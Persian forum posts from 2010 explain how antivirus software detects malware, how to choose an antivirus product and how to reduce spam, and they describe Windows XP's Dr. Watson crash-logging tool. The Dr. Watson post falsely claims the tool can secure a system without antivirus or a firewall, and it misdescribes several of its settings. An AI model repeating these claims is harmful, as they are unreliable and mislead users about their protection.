در روش integrity checksum، فرض براین است که ویروس قصد اعمال تغییراتی در فایل دارد. مثلا*ً یک ویروس می*خواهد که روی یک فایل چیزی بنویسد یا این*که خودش را به آخر فایلی اضافه کند. در این روش نرم*افزار checksum فایل غیرویروسی و یا درایورهای تمیز را ذخیره می*کند و هرگاه که تغییری در این checksum مشاهده شود متوجه می*شود که احتمال دارد ویروسی این کار را انجام داده باشد. در این روش نیز احتمال تولید نتایج غلط وجود دارد. این روش در مقابله با ویروس*های ماکرویی یا ویروس*های مانند code Red که بدون این*که در هیچ فایلی ذخیره شوند در حافظه بارگذاری و اجرا می*شوند، کارایی چندانی ندارد.
اگر یک کد مزاحم از تمام الگوریتم*های یک ضدویروس که تاکنون نام بردیم بگذرد، در گام آخر توسط فناوری دیگری به نام Activity Blocker از فعالیت آن جلوگیری می*شود. این تکنولوژی از تمام فعالیت*هایی که ممکن است توسط یک کد مخرب صورت بپذیرد جلوگیری می*کند مثلاً اگر تشخیص دهد که هارددیسک در حال فرمت شدن است از آن جلوگیری می*کند.
یک ضدویروس چه موقع ویروس*ها را شناسایی می*کند؟
معمولاً ضدویروس*ها به دو روش می*توانند ویروس*ها را شناسایی کنند.
در روش اول ضدویروس، به صورت Real Time (بلادرنگ) و همان موقع که فایل مورد دسترسی قرار می*گیرد عمل می*کند. در این روش، ضدویروس درون حافظه مقیم می*شود و تمام فعالیت*های مربوط به سیستم را مورد ارزیابی و بررسی قرار می*دهد. این نرم*افزارها با همکاری سیستم*عامل متوجه می*شوند که هم*اکنون قرار است فایلی مورد دسترسی قرار بگیرد. سریعاً این فایل را بررسی و نتیجه را گزارش می*دهند. به این روش on-access می*گویند.
مزیت این روش در ارایه یک حفاظت دایمی است ولی اشکالی که دارد این است که تنها فایل*ها را به هنگام دسترسی مورد بررسی قرار می*دهد. یعنی احتمالاً اگر ویروسی در یک فایل قرار گرفته باشد و در دیسک ذخیره شده باشد، با این روش قابل شناسایی نیست. در روش دوم این امکان به کاربر داده می*شود که خودش نرم*افزار ضدویروس را برای بررسی کردن دیسک یا یک فایل به کمک بگیرد. برای این*که فعالیت فوق بازده بهتری داشته باشد باید ضدویروس را طوری تنظیم کرد که در دوره*های زمانی معین اقدام به اسکن کند. این روش به on-demand معروف است.
ضدویروس*ها چه کارهایی را می*توانند انجام دهند و چه کارهایی را نمی*توانند انجام دهند؟
1- محافظت صددرصدی
هیچ ضدویروسی وجود ندارد که بتواند به صورت صددرصد سیستم شما را در مقابل ویروس*ها ایمن کند. ویروس*ها و کدهای مخرب همیشه از ضد*ویروس*ها جلو بوده*اند CodeRed.،Melissa ،Funlove ،Nimda و ویروس*های زیاد دیگر این فرضیه را ثابت نموده*اند و البته دلیل پویایی و حیات نرم*افزارهای ضدویروس نیز همین قضیه می*باشد.
به خاطر دارید که ضدویروس*ها برای شناسایی یک ویروس به*طور معمول نیاز به virus signature دارند و البته هنگامی که این signature موجود نباشد از روش*های heuristic استفاده می*شود که این روش* نیز همیشه جواب درست را برنمی*گرداند. با این همه، ضدویروس*ها در مقابل ویروس*های شناخته شده (بیش از60 هزار عدد) یک حفاظت همه جانبه از سیستم شما به عمل می*آورند.
بیشتر ضدویروس*ها در صورت بروز و ظهور یک ویروس جدید قادر خواهند بود که به سرعت آن را شناسایی کنند و سیستم شما را از وجود این ویروس پاک نگه دارند.
2- بازسازی فایل*های ویروسی شده
آیا هر ویروسی که توسط نرم*افزار ضدویروس شناسایی شد قابل از بین بردن است؟
بستگی دارد که عملکرد ویروس چگونه باشد.
بعضی از ویروس*ها مانند ویروس*های ماکرویی به راحتی توسط نرم*افزار ضدویروسی تشخیص داده می*شوند و از فایل بیرون کشیده می*شوند و پاک می*شوند. این فایل*ها هیچ آسیبی به فایل میزبان خود نمی*رسانند.
اما بعضی از ویروس*های دیگر نیز هستند که بر روی فایل میزبان چیزی می*نویسند یا این*که اصلاً کدویروس را درون فایل میزبان قرار می*دهند. یکی از انواع این ویروس*ها Loveletter است. در این مورد به وضوح دیده می*شود که فایل میزبان قابل بازیابی نیست و تنها راه*حل این است که این فایل را پاک کنیم.
دسته دیگری از ویروس*ها وجود دارند (مانند ویروس Nimda) که علاوه بر ایجاد تغییرات بر روی فایل، قابلیت دستکاری فایل*های سیستم و رجیستری را نیز دارند. در این موارد ضدویروس به تنهایی نمی*تواند کاری بکند. شما به ابزاری نیاز دارید که بتواند فایل ویروسی را حذف کند و تغییرات اعمال شده در سیستم شما را به حالت اولیه برگرداند. معمولاً این ابزار کمکی بر روی وب سایت*های فروشندگان نرم*افزار ضدویروس موجود می*باشد.
معیارهای انتخاب یک ضدویروس
حالا که متوجه شدید ضدویروس چگونه کار می*کند و چه کارهایی را می*تواند برای شما انجام دهد، وقت آن است ببینیم چه معیارهایی برای انتخاب یک ضدویروس مهم هستند.
1- شناسایی
مهمترین وظیفه یک ضدویروس شناسایی ویروس*ها است. اما چگونه باید مطمئن شویم که یک ضدویروس همان کاری را که ادعا می*کند انجام می*دهد؟
آیا همین قدر که برنامه ضدویروس یک گزارش مبنی بر شناسایی ویروس*ها تولید می*کند متقاعد می*شوید که کار خود را به خوبی انجام می*دهد؟ پیدا کردن جواب دو سوال زیر می*تواند به شما کمک *کند:
پرسش اول: نرم*افزار ضدویروس قادر است چه تعداد ویروس را مورد شناسایی قرار دهد. از این پارامتر عموماً با نام detection Rate یاد می*شود.
پرسش دوم: نرم*افزار ضدویروس تحت چه شرایطی می*تواند یک ویروس را شناسایی کند؟ آیا اگر این ویروس در حافظه مقیم شده باشد توسط ضدویروس قابل تشخیص است؟
توصیه های مهم
اول: یک راه*حل این است که شما خودتان ضدویروس را بررسی کنید. برای این کار بر روی اینترنت به دنبال ویروس*های مختلفی بگردید و این ویروس*ها را به سیستم خودتان بیاورید و ببینید که آیا ضد*ویروس می*تواند این ویروس*ها را شناسایی کند یا نه؟ ولی من شما را از انجام این عمل شدیداً منع می*کنم. حتی اگر فروشنده ضدویروس خودش این پیشنهاد را به عنوان یک راه*حل برای آزمایش ضدویروس داده باشد. همان*طورEicar که گفته است: استفاده از ویروس*های واقعی برای تست کردن یک ضدویروس در یک محیط عملیاتی مانند این است که شما آتش را به دفتر کار خود بیاورید (ترفندستان) و بعد بخواهید بررسی کنید که آیا حسگرهای دود* به خوبی کار می*کنند یا نه؟ شما هرگز نمی*توانید از نتیجه کار مطمئن باشید. ممکن است برنامه ضدویروس نتواند همه موارد را شناسایی کند و ویروس*ها شروع به پاک کردن داده*های ارزشمند سیستم شما و پخش شدن در شبکه بنمایند. امری که ممکن است به بهای از دست دادن شغلتان تمام شود.
دوم: اگر شما واقعاً می*خواهید مطمئن شوید که یک ضدویروس قادر به انجام چه کارهایی است می*توانید در سایتwww.eicar.org یک سری آزمایش*های بی*خطر جهت آزمایش ضدویروس پیدا کنید. در این سایت فایل*های آزمایشی و بی*خطری وجود دارند که بیشتر ضدویروس*ها آن*ها را به عنوان ویروس شناسایی می*کنند.
در این حالت اگر ضدویروس موفق به از بین*بردن ویروس شود چه بهتر و چنانچه نتواند، شما هیچگونه اطلاعاتی از دست نخواهید داد. بدین*ترتیب می*توانید یک روش امن برای آزمایش ضدویروس به کار ببندید.
سوم: شما می*توانید از منابع موجود که قبلاً این کار را انجام داده*اند استفاده کنید. بعضی از سازمان*ها، متولی انجام همین فعالیت می*باشند. لیستی از ویروس*ها توسط www.wildlist.org (http://www.tarfandestan.com/engine/go.php?url=aHR0cDovL3d3dy53aWxkbGlzdC5vcmc%3D) نگهداری می*شود. در این سایت می*توانید ببینید که Detection Rate یا نرخ شناسایی هر ضدویروس چقدر است.
این سایت*ها نیز برای این منظور مفید می*باشند:
www.virusbtn.com (http://www.tarfandestan.com/engine/go.php?url=aHR0cDovL3d3dy52aXJ1c2J0bi5jb20%3D): این سایت، آماری از توان ضدویروس*ها برای شناسایی ویروس*های موجود در سایت wildlist (در دو مورد on-demand,Real-time) را ارایه می*کند.
www.check-mark.com/cgi-bin/Redirect.pl (http://www.tarfandestan.com/engine/go.php?url=aHR0cDovL3d3dy5jaGVjay1tYXJrLmNvbS9jZ2k tYmluL1JlZGlyZWN0LnBs): در این سایت ضدویروس*ها در دو سطح مورد بررسی قرار می*گیرند. سطح اول همان است که در سایت Virusbtn نیز انجام می*شود یعنی فقط شناسایی ویروس*ها.
نرم*افزارهایی در سطح دوم موفق هستند که قادر به از بین بردن ویروس نیز باشند.
2- امکانات
بسیار مهم است که بدانیم چه نوع فناوری در ضدویروس موردنظر استفاده شده است و چه ویژگی*هایی دارد.
1- سازگاری سخت*افزاری و نرم*افزاری سیستم شما با ضدویروس انتخاب شده.
در نگاه اول شاید این مساله کمی بدیهی به نظر برسد. اما به هر حال برخی از فروشندگان آخرین نسخه نرم*افزار ضدویروس خود را که تنها با جدیدترین سیستم*عامل*ها کار می*کنند، ارایه می*دهند.
بنابراین منطقی به نظر می*رسد که قبل از اقدام به خرید نرم*افزار حتماً به این نکته توجه کنید.
2- توانایی پویش(on-Access Real time) را داشته باشد.
این یکی از ویژگی*های اساسی است که یک ضد*ویروس باید دارا باشد. این بخش نرم**افزار باعث می*شود که نرم*افزار ضدویروس مانند یک سگ نگهبان عمل کند. یعنی همان موقع که ویروس در حافظه بارگذاری می*شود ویروس را شناسایی و خنثی کند.
این بخش نرم*افزار باید قادر باشد که به تمام نواحی سیستم از جمله فایل سیستم، بوت رکورد،
Mabter Boot Record) MBR) و حافظه سرکشی کند.
3- توانایی پویش به صورت on-demand را داشته باشد. یکی از کارهای ضروری که برای حفظ سلامت سیستم*تان باید انجام دهید این است که هراز*چندگاهی وضعیت سیستم خود را با اجرای ضدویروس بررسی کنید.
مخصوصاً هنگامی که آخرین نسخه ضدویروس را دریافت می*کنید حتماً این کار را انجام دهید. سناریوی زیر انجام توصیه بالا را توجیه می*کند.
شما یک e-mail دریافت می*کنید که این e-mail شامل یک ضمیمه و ویروسی است. منتهی شما این ضمیمه را هیچ*گاه باز نکرده*اید. اجرای ضدویروس بروز شده باعث می*شود که (احتمالاً) ویروس فوق شناسایی شود.
4- از الگوریتم*های Heuristic پشتیبانی کند.
5- بتواند انواع فایل*ها با فرمت*های مختلف را پویش کند.
اگر شما ویروسی در سیستم داشته باشید که قادر باشد به هر نوع فایلی بچسبد، نیاز به ضدویروسی دارید که بتواند فایل*های مختلف با پسوندهای مختلف را مورد بررسی قرار دهد. قبلاً تنها راه انتشار یک ویروس این بود که به فایل*های برنامه*ای بچسبد، اما امروزه این امکان وجود دارد که ویروس برای انتشار خودش از فایل*های غیراجرایی نیز استفاه کند.
6- توانایی جلوگیری از فعالیت اسکریپت*های مخرب را داشته باشد. بعضی از ویروس*ها هستند که با استفاده از اسکریپت*ها طراحی شده*اند. کرم*های I Love You از این نوع است.
موتور ضدویروس باید این قابلیت را داشته باشد که کدهای VBS و JS را شناسایی کند و در صورتی که آن*ها را مخرب تشیخص دهد از فعالیتشان جلوگیری کند.
7- توانایی بررسی ضمیمه e-mail را داشته باشد.
امروزه بسیاری از ویروس*ها توسط e-mail *انتشار پیدا می*کنند.
بعضی از آن*ها مانند کرم KAK حتی این توانایی را دارند تا در سیستم*هایی که خوب پیکربندی نشده*اند، بدون این*که ضمیمه e-mail باز شود شروع به انتشار خود بنمایند.
8- قابلیت بررسی فایل*های فشرده را نیز داشته باشد. اگر چه یک ویروس هنگامی که در یک فایل فشرده قرار دارد نمی*تواند آسیبی به سیستم برساند ولی بهتر است است که اصلاً این ویروس در سیستم شما وجود نداشته باشد.
9- قابلیت این را داشته باشد که اسب*های تراوا، جاوااپلت*های مخرب و اکتیوایکس*های مزاحم را شناسایی کند. نرم*افزارهای ضدویروس نه تنها باید این قابلیت را داشته باشند که ویروس*ها و کرم*ها را شناسایی کنند بلکه باید بتوانند از فعالیت*اسب*های تراوا، اکتیویکس*ها و اپلت*های جاوا نیز جلوگیری کنند.
امروزه بیشتر ضدویروس*ها دارای این خصوصیت می*باشند.
3- نگهداری از نرم*افزار
دو مورد زیر در نگهداری از نرم*افزارهای ضدویروس قابل توجه هستند.
1- بروز کردن مداوم ضدویروس برای مقابله با ویروس*های جدید.
در بخش*های قبل لزوم بروز نگه*داشتن بانک*اطلاعاتی ضدویروس توضیح داده شد. بنابراین ضدویروس منتخب شما باید به *گونه*ای باشد که به راحتی قابلیت روزآمد شدن را داشته باشد و علاوه***برآن به*طور مداوم رکوردهای این بانک اطلاعاتی زیاد شود. شما همچنین باید متوجه این مطلب باشید که از چه مکانیزم*هایی جهت بروز نگه*داشتن ضدویروس استفاده می*شود. آیا نسخه*های بروز شده بر روی وب سایت فروشندگان قرار دارد؟ و آیا به راحتی قابل دریافت می*باشد؟ و آیا شما به راحتی می*توانید از وجود یک ویروس جدید آگاهی یابید یا نه؟
اگر شما دارای ارتباط اینترنتی کم سرعتی باشید دریافت کردن این نرم*افزار بسیار خسته*کننده می*باشد. این نکته نیز مهم است که در هر بار انجام این عمل باید فقط قسمت روزآمد شده نرم*افزار دریافت شود.
نکته دیگر این*که، نویسندگان ضدویروس*ها چقدر سعی می*کنند تا روش*های جدیدی که برای تولید ویروس*ها استفاده می*شود بشناسند و در نرم*افزار خود به کار گیرند؟
و نکته مهم*تر این*که از زمان خبر انتشار یک ویروس تا وقتی که نرم*افزار ضدویروس برای این ویروس بروز شود چقدر طول می*کشد؟
4- نرم*افزارهای ضدویروس چقدر بر کارایی سیستم شما تأثیرگذار می*باشند؟
همه نرم*افزارهای ضد*ویروس بر کارایی سیستم شما تأثیر می*گذارند. اغلب اوقات اندازه*گیری میزان این تأثیر سخت است ولی به هر حال به عنوان یک معیار مهم در انتخاب ضدویروس مطرح می*باشد. پرسش*های زیر در این مقوله مهم می*باشند.
- آیا نرم*افزار ضدویروس باعث کندتر شدن پروسه بوت سیستم شده است؟
- زمان دسترسی به یک فایل را افزایش داده است؟
پس برای انتخاب یک ضدویروس مناسب ناچارید که چند آزمایش را انجام دهید.
مثلاً می*توانید زمانی که برای پویش*های مختلف (تحت شرایط مختلف) توسط یک ضدویروس مصرف می*شود را محاسبه کنید و در این مدت، زمان میانگین استفاده از حافظه و cpu را نیز اندازه*گیری کنید.
یا این*که زمانی که برای اسکن on-demand نیاز می*باشد را برای محصولات مختلف اندازه*گیری کنید.
یا این*که وقتی که ضدویروس در حال پویشReal-time می*باشد ببینید که باز کردن یک فایل بزرگ چقدر طول می*کشد؟
توجه به این موضوع که محیط تست برای همه ضدویروس*ها که مورد ارزیابی قرار می*گیرند، مشابه باشد بسیار مهم است از جلمه این*که:
حجم فایل*ها و نوع فایل*هایی که برای هر یک از ضدویروس*ها مورد بررسی قرار می*گیرد مهم است.
هر دو ضدویروس به یک ترتیب و روی یک سخت*افزار پیکربندی شده باشند.
5- نرم*افزار ضدویروس قابل کنترل باشد.
اگر شما نتوانید بر روی ضدویروس خود نظارت کامل داشته باشید مانند این است که ضدویروس ندارید.
شما باید بتوانید به*طور مرتب (هر زمان که نیاز داشتید) و بدون زحمت زیادی بانک اطلاعاتی خود را کامل*تر یا بروز کنید.
به راحتی بتوانید از سرورها خود و کلاینت*های خود محافظت کنید و گزارش*های نرم*افزار ضدویروس را برای هر کدام از آن*ها ببینید.
6- پشتیبانی ضدویروس همیشگی و موثر باشد.
فروشنده نرم*افزار باید قادر باشد که پشتیبانی مورد نظر شما را انجام دهد. مطمئناً پشتیبانی که برای کاربر در خانه ارایه می*شود با پشتیبانی که برای یک شرکت بزرگ انجام می*شود با یکدیگر متفاوت هستند.
فروشنده برای پشتیبانی می*تواند خدمات زیر را به شما ارایه دهد.
1- قادر باشد که شما را به صورت on-line پشتیبانی کند و اگر شک کردید که فایلی حاوی ویروس است، بتوانید آن را برای فروشنده ارسال کنید تا نظر خودش را راجع*به فایل بیان کند.
اگر یک ویروس جدید شناخته شود، فروشنده باید بتواند این موضوع را به اطلاع شما برساند تا اقدامات لازم را برای خودتان، یا برای شبکه*ای که شما مس‡وول آن هستید انجام دهید.
نتیجه*گیری
هیچ*کدام از نرم*افزارهای ضدویروس بهترین نیستند. یک ضدویروس وقتی برای شما بهترین است که بتواند نسبت به نرم*افزارهای دیگر به صورت کاملتری نیازهای شما را برآورده کند.
اطلاعاتی که فروشنده نرم*افزار ارایه می*کند همیشه خوب است ولی انتخاب ضدویروس نباید تنها براساس ادعاهای فروشنده باشد.
آنتی ویروسها جادو نمیکنند!
آنتی ویروسها محافظان سیستم های ما هستند. این گونه نرم افزارها میتوانند بنا به ساختمان برنامه ای خود, کنترل مرکزی سیستم را در دست گیرند و مواظب رفتار مشکوک یا برنامه های مخرب اجرایی بر روی سیستم ما باشند ولی با گسترش روابط, نمیتوانیم به صورت کامل روی آنها حساب کنیم زیرا این برنامه ها از حمله ویروسها در امان نیستند.
در بعضی موارد دیده شده که ویروسها بروی سیستم اجرا میشوند ولی آنتی ویروس هیچ واکنشی در مقابل ویروس ندارند و مانند یک برنامه طبیعی با آنها برخورد میکند.
خوشبختانه شرکت های آنتی ویروس برای تسلط بر کل ارتباطات اینترنتی اقدام به تاسیس شرکتهایی به صورت نمایندگی در اکثر کشورها کرده اند. آنها به این منظور نشان دادند که می خواهند کرم ها را در نطفه خفه کنند و از پخش گسترده انها در کل شبکه جلوگیری نمایند.
آنها اقدام به آگاه سازی کاربران اینترنتی از طریق سرویسهایی مانند رادار کرده اند. شاید نقاط ضعف شرکت های آنتی با ارائه این نوع سیستمها به کاربران اثبات شده باشد. انها بر این عقیده اند که به تنهایی و بدون کمک کاربران اینترنتی نمی توانند از پس کرم های اینترنتی برآیند. بنابر این هر شرکت آنتی ویروس آنالیز های خود را در اختیار کاربران قرار میدهد تا اگر نرم افزار آن شرکت نتوانست کرم را خنثی کند کاربران با داشتن اطلاعات کافی شروع به مقابله با کرمها کنند. همان طور که می دانید آنتی ویروس ها فقط یک نرم افزار هستند و ما نمی توانیم تصور کنیم که آنها میتوانند معجزه کنند, باید درک کرد که این نرم افزارها خود دارای مشکل هایی می باشند.
چند تکنیک آنتی ویروس Kaspersky: (از بهترین آنتی ویروسها)
1. تکنیک تله گذاری: در این روش آنتی ویروس توجه ویروس را به خود جلب می کند.
2. مخفی ماندن: وقتی ما آنتی ویروسی در کامپیوتر نصب میکنیم ویروسها در بین فایلها پنهان می شوند. در آنتی ویروس Kaspersky هیچ قسمتی از سیستم (نرم افزاری) متوجه نصب نمی شوند.
3. سیستم رادار: اطلاع رسانی به کاربران.
و ده ها تکنیک دیگر.
Behzad AZ
06-30-2010, 08:19 AM
اسپم به زبان ساده ایمیلهای ناخواسته ای است که معمولأ به صورت انبوه برای شما ارسال میشوند. اسپمها یکی از متداولترین و در عین حال منفی ترین جنبه های دارا بودن یک آدرس Email است. با این که در حال حاضر و با توجه به تکنولوژی های موجود امکان حذف کامل این نوع از نامه های الکترونیکی ناخواسته وجود ندارد، ولی قصد داریم ترفندهایی را به شما معرفی کنیم که با استفاده از آنها می توانید تعداد دریافت آنها را کاهش دهید.
Spam، نسخه الکترونیکی از "نامه های بدرد نخور" است. واژه Spam به پیام های الکترونیکی ناخواسته، اطلاق می گردد. این نوع از نامه های الکترونیکی ارتباط مستقیمی با ویروس نداشته و حتی ممکن است پیام هائی که از منابع معتبر ارسال شده اند نیز در زمره این گروه قرار گیرند.
چگونه می توان میزان Spam را کاهش داد؟
با رعایت برخی نکات، می توان میزان Spam دریافتی را بطرز محسوسی کاهش داد:
آدرس Email خود را بدون دلیل در اختیار دیگران قرار ندهید. آدرس های پست الکترونیکی به اندازه ای متداول شده اند که شما می توانید بر روی هر فرمی که به منظور کسب اطلاعات شما در نظر گرفته می شود، وجود فیلد خاصی به منظور دریافت آدرس Email را مشاهد نمائید. تعدادی زیادی از کاربران بدون درنظر گرفتن مسائل جانبی، آدرس Email خود را در هر محلی و یا هر فرمی درج می نمایند. مثلأ شرکت ها، اغلب آدرس ها را در یک بانک اطلاعاتی ثبت تا بتوانند وضعیت مشتیریان خود را در آینده دنبال نمایند. برخی اوقات، اطلاعات فوق به سایر شرکت ها فروخته شده و یا امکان استفاده مشترک برای آنان، فراهم می گردد. بدیهی است در چنین مواردی ممکن است برای شما یک Email و از طرف شرکتی ارسال شود که نه توقع آن را داشته اید و نه از آنان درخواستی مبنی بر ارائه اطلاعات خاصی را داشته اید.
بررسی سیاست های محرمانگی. قبل از ارسال آدرس Email خود به صورت Online، بدنبال Privacy سایت مورد نظر بگردید.تعداد بسیار زیادی از سایت های شناخته شده و خوشنام دارای یک لینک خاص (ترفندستان) بر روی سایت خود به منظور آشنائی کاربران با سیاست های آن سایت در خصوص نحوه برخورد با اطلاعات ارسالی شما می باشند. (همواره این پرسش را برای خود مطرح نمائید که آیا ما آدرسEmail خود را در سایت هائی درج می نمائیم که نسبت به آنان شناخت کافی داریم؟). شما می بایست قبل از ارسال آدرس Email خود و یا سایر اطلاعات شخصی، سیاست های اعلام شده توسط سایت مورد نظر را مطالعه نموده و از این موضوع آگاه شوید که مالکین و یا مسئولین سایت قصد انجام چه کاری را با اطلاعات ارسالی شما دارند.
دقت لازم در خصوص گزینه هائی که به صورت پیش فرض فعال شده اند. زمانی که شما برای دریافت خدمات و یا Account جدید عملیات Sign In را انجام می دهید، ممکن است بخشی وجود داشته باشد که به شما مجموعه ای از گزینه ها را در خصوص دریافت Email در خصوص محصولات و یا سرویس های جدید، ارائه نماید. در برخی مواقع، گزینه ها به صورت پیش فرض انتخاب شده اند، بنابراین در صورتی که شما آنان را به همان وضعیت باقی بگذارید، در آینده نه چندان دور برای شما حجم زیادی از نامه های الکترونیکی که شاید انتظار آنان را نداشته باشد، ارسال گردد.
استفاده از فیلترها: تعدادی زیادی از برنامه های پست الکترونیکی امکان فیلترینگ را ارائه می نمایند. پتانسیل فوق به شما این اجازه را خواهد داد که آدرس های خاصی را بلاک نموده و یا امکان دریافت نامه را صرفأ از طریق لیست تماس موجود بر روی کامپیوتر خود، داشته باشید. برخی مراکز ارائه دهنده خدمات اینترنت (ISP) نیز سرویس فیلترینگ و علامت گذاری مربوط به مقابله با Spam را ارائه می نمایند. در چنین مواردی ممکن است پیام های معتبری که بدرستی طبقه بندی نشده باشند به عنوان Spam درنظر گرفته شده و هرگز به صندوق پستی شما ارسال نگردند.
هرگز بر روی لینک های موجود در یک Spam، کلیک ننمائید. برخی از منابع ارسال کننده Spam با ارسال آدرس های Email متغیر در یک Domain خاص، سعی در تشخیص معتبر بودن یک آدرس Email می نمایند. (مثلأ تشخیص آدرس های Email معتبر موجود بر روی hotmail و یا yahoo).در صورتی که شما بر روی یک لینک ارسالی (ترفندستان) توسط یک Spam کلیک نمائید، صرفأ معتبر بودن آدرس Email خود را به اطلاع آنان رسانده اید. پیام های ناخواسته ای که یک گزینه "عدم عضویت" وسوسه انگیز را در اختیار شما قرارمی دهند، اغلب به عنوان روشی به منظور جمع آوری آدرس های Email معتبر مورد استفاده قرار گرفته که در آینده از آنان به منظور ارسال Spam استفاده گردد.
غیرفعال نمودن گزینه دریافت اتوماتیک گرافیک در نامه های الکترونیکی با فرمت HTML. تعداد زیادی از شرکت ها، نامه های الکترونیکی را با فرمت HTML و همراه با یک فایل گرافیکی لینک شده ارسال نموده که در ادامه از آن به منظور ردیابی فردی که پیام الکترونیکی را باز نموده است، استفاده می نمایند. زمانی که برنامه سرویس گیرنده پست الکترونیکی شما، اقدام به download گرافیک از سرویس دهنده آنان می نماید، آنان می دانند که شما پیام الکترونیکی را باز نموده اید. با غیر فعال نمودن HTML mail و مشاهده پیام ها با فرمت صرفأ متن، می توان پیشگیری لازم در خصوص این مسئله را انجام داد.
ایجاد و یا بازنمودن Account های جدید اضافی: تعداد زیادی از سایت ها، اقدام به عرضه آدرس پست الکترونیکی به صورت رایگان می نمایند. در صورتی که شما بطور مداوم اقدام به ارسال آدرسEmail خود می نمائید (برای خرید online، دریافت سرویس و...)، ممکن است مجبور به ایجاد یک account دیگر به منظور حفاظت آدرس account اولیه خود در مقابل spam شوید. شما همچنین می بایست از یک account دیگر در زمانی که اطلاعاتی را بر روی بولتن های خبری online، اطاق های چت، لیست های عمومی Mailing و یا USENET ارسال می نمائید، استفاده نمائید. بدین تریتب می توان یک سطح حفاظتی مناسب در خصوص دریافت spam به آدرس Email اولیه خود را ایجاد کرد.
برای سایرین Spam ارسال ننمائید. یک کاربر متعهد و دلسوز باشید. در خصوص پیام هائی که قصد فوروارد نمودن آنان را دارید، سختگیرانه عمل کنید. هرگز هرگونه پیامی را برای هر شخص موجود در لیست دفترجه آدرس خود Forward نکرده و اگر فردی از شما بخواهد که پیامی را برای وی فوروارد ننمائید، به درخواست وی احترام بگذارید.
Behzad AZ
06-30-2010, 08:20 AM
ممکن است شما نیز تا به حال نام Dr.Watson (دکتر واتسون) ویندوز XP را شنیده باشید. ابزاری که همیشه در پشت پرده ویندوز بوده است و بسیاری از کاربران از توانایی های این برنامه مفید بی خبرند. شما به وسیله این برنامه میتوانید به راحتی ریشه مشکلات بسیار جدی را که در سیستم ها اغلب باعث قفل کردن دستگاه و نظایر آن میشود را ردیابی کنید و سپس برای رفع مشکل اقدام کنید. با استفاده از این ابزار فوق العاده میتوانید بدون نیاز به نرم افزارهای آنتی ویروس و فایروال امنیت سیستم خود را تضمین کنید.
هنگامی که شما برنامه Dr.Watson را اجرا کنید، این برنامه در پس زمینه قرار میگیرد و منتظر به وجود آمدن یک مشکل در سیستم شما میماند تا جزئیات آن را ثبت کند (آیکن این برنامه در نوار وظیفه قرار میگیرد). بسیاری از افراد فکر میکنند که به این برنامه در ویندوز XP نیاز پیدا نخواهند کرد چون این ویندوز نسبت به ویندوزهای قبلی خود بسیار پایدارتر و مستحکم تر است و خوب همه این موضوع را قبول دارند. اما با تمام این پایداری بازهم امکان دارد ناگهان مشکل جدی ای برای ویندوز XP نیز پیش بیاید. اگر شما در آن هنگام این برنامه را اجرا کرده باشید میتوانید به راحتی مشکل را رد یابی کرده و پس از حل آن دیگر نگران به وجود آمدن چنین مشکلی نباشید. پس بهتر است همیشه به فکر باشید تا بعدا پشیمان نشوید.
برنامه Dr.Watson تمامی اطلاعات وابسته به سیستم را درست قبل از اینکه خطا و مشکل اتفاق بیفتد ضبط میکند. به عبارت دیگر اگر سیستمتان از حرکت ایستاد و یا یک خطای سیستمی جدی را به شما نشان داد میتوانید کامپیوتر خود را Restart کرده و بعد به سراغ فایل Log ای که برنامه Dr.Watson درست قبل از وقوع مشکل میسازد بروید. این فایل شامل جزئیات کامل مشکل میباشد. در اینجا اگر کمی اطلاعات حرفه ای راجع به سیستم و کدهای سیستمی داشته باشید میتوانید به راحتی مشکل را ریشه یابی و حل کنید. در غیر این صورت اگر مشکل خیلی جدی باشد شما حتما نیاز به یک متخصص خواهید داشت که با نشان دادن فایل Log به آن متخصص، او به راحتی (در اکثر مواقع!) مشکل را برای شما حل میکند. اما (ترفندستان) همواره یادتان باشد که هیچ برنامه ای نمیتواند بهترین باشد. برنامه Dr.Watson اگر چه در بسیاری از موارد به خوبی از عهده وظیفه خودش بر می آید اما گاها نیز ممکن است اگر مشکل سیستم شما خیلی جدی باشد و باعث قفل شدن کل سیستم شما گردد، نتواند ریشه مشکل را ثبت کند و در گزارشش قید کند. اما نگران نباشید چون این اتفاق ممکن است یک در هزار رخ دهد و اصلا جای نگرانی نیست.
نکته جالب توجه دیگر این برنامه این است که شما با ارسال فایل Log آن برای شرکت Microsoft میتوانید از راهنماییهای متخصصان این شرکت نیز برای رفع مشکل خودتان استفاده کنید. فایل Log برنامه Dr.Watson اغلب خطاها را تشریح کرده و روش درست و منطقی را برای اصلاح و تعمیر آن به شما پیشنهاد میکند اما همواره بهتر است که از یک فرد متخصص نیز در این زمینه کمک بخواهید که به نظر من متخصصان خود شرکت Microsoft میتوانند بهترین انتخاب شما باشند جون کاملا رایگان اند!
برای ارتباط با این متخصصین فقط کافی است که به قسمت پشتیبانی تکنیکی سایت Microsoft مراجعه کنید و بعد فایل Log را برای آنها ارسال کنید و منتظر راهنمایی های آنها بمانید. مطمئن باشید شما را بدون جواب نخواهند گذاشت.
و اما نحوه کار با این برنامه مفید:
این برنامه به صورت پیش فرض از دید کاربران پنهام است و شما نمیتوانید آن را در پوشه Tools بیابید. برای اجرای آن ابتدا از طریق منوی Start وارد برنامه Run شده و عبارت DrWtsn32 را تایپ کرده و سپس Enter را بزنید تا برنامه اجرا شود.
پس از شروع برنامه شما میتوانید تنظیمات مورد نیاز را انجام داده و بعد به سایر کارهای خود بپردازید.
اما توضیح تنظیمات برنامه:
در قسمت Log File Path شما میتوانید مسیر ذخیره فایل Log برنامه را تعیین کنید.
در قسمت Crash Dump شما میتوانید مسیر فایل ذخیره موقت (تصویر لحظه ای) برنامه را تعیین کنید (بهتر است این قسمت را تغییر ندهید).
در قسمت Wave File شما میتوانید یک فایل صدا را تعیین کنید که برنامه هر وقت مشکلی را ثبت کرد به شما با آن صدا هشدار دهد.
در قسمت Number Of Instructions شما میتوانید تعداد راهنماییهایی را که برنامه در فایل Log به شما آموزش میدهد را تعیین کنید.
در قسمت Number Of Errors To Save شما (ترفندستان) میتوانید تعداد ثبت خطاها را در هر فایل Log مشخص کنید.
در قسمت Crash Dump Type شما میتوانید نوع ذخیره فایل Dump (یا تصویر لحظه ای) را در هنگام Crash سیستم تعیین کنید. Full یعنی ذخیره به صورت کامل با تمام جزئیات، Mini یعنی تا حد امکان خلاصه و مختصر، NT4 Compatible Full یعنی فایلی کامل سازگار با سیستمهای NT4 .
در قسمت Options میتوانید جزئیات تکنیکی فایل Log خود را افزایش یا کاهش دهید. به ترتیب زیر:
Dump Symbol Table: نمایش و ذخیره فایل Dump با تمام کاراکترهای حرفی و شکلی.
Dump All Thread Contexts: نمایش و ذخیره فایل Dump با تمام متون و داده های رشته ای.
